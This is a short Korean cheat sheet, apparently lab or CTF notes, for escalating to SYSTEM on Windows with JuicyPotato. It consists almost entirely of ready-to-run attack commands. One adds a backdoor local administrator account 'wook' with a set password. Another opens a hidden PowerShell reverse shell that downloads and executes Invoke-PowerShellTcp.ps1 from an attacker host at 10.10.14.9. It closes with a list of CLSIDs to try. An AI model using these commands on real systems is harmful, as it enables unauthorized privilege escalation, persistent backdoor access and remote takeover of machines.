SYSTEM 권한 확인용 간단 실행
`NT AUTHORITY\SYSTEM` 으로 찍히면 성공.
```powershell
.\JuicyPotato.exe -l 1337 -p "C:\Windows\System32\cmd.exe" -a "/c whoami /all > C:\Users\merlin\Desktop\jp.txt" -t * -c {4991d34b-80a1-4291-83b6-3328366b9097}
type C:\Users\merlin\Desktop\jp.txt
```
새 계정 생성 & 관리자 그룹 추가
```powershell
# 1) 로컬 유저 생성
.\JuicyPotato.exe -l 1337 -p "cmd.exe" -a "/c net user wook WookPass123! /add" -t * -c {4991d34b-80a1-4291-83b6-3328366b9097}
# 2) Administrators 그룹에 추가
.\JuicyPotato.exe -l 1337 -p "cmd.exe" -a "/c net localgroup administrators wook /add" -t * -c {4991d34b-80a1-4291-83b6-3328366b9097}
```
리버스쉘
```powershell
# 공격자 칼리 1
rlwrap nc -lvnp 4444
# 공격자 칼리 2 - InvokePowerShellTcp.ps1 호스팅
python3 -m http.server 80
# 타겟 윈도우
.\JuicyPotato.exe -l 1337 -p "cmd.exe" -a "/c powershell -nop -w hidden -c IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.9/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.9 -Port 4444" -t * -c {4991d34b-80a1-4291-83b6-3328366b9097}
```
다른 CLSID
```powershell
# 가장 먼저 시도 BITS 서비스 CLSID
{4991d34b-80a1-4291-83b6-3328366b9097}
# 추가로 알려진 것들
{e60687f7-01a1-40aa-86ac-db1cbf673334}
{6d18ad12-bde3-4393-b311-099c346e6df9}
{03ca98d6-ff5d-49b8-abc6-03dd84127020}
{5c6c3c20-0cf4-11d1-b95a-0060977b9152}
{BA126AD1-2166-11D1-B1D0-00805FC1270E}
```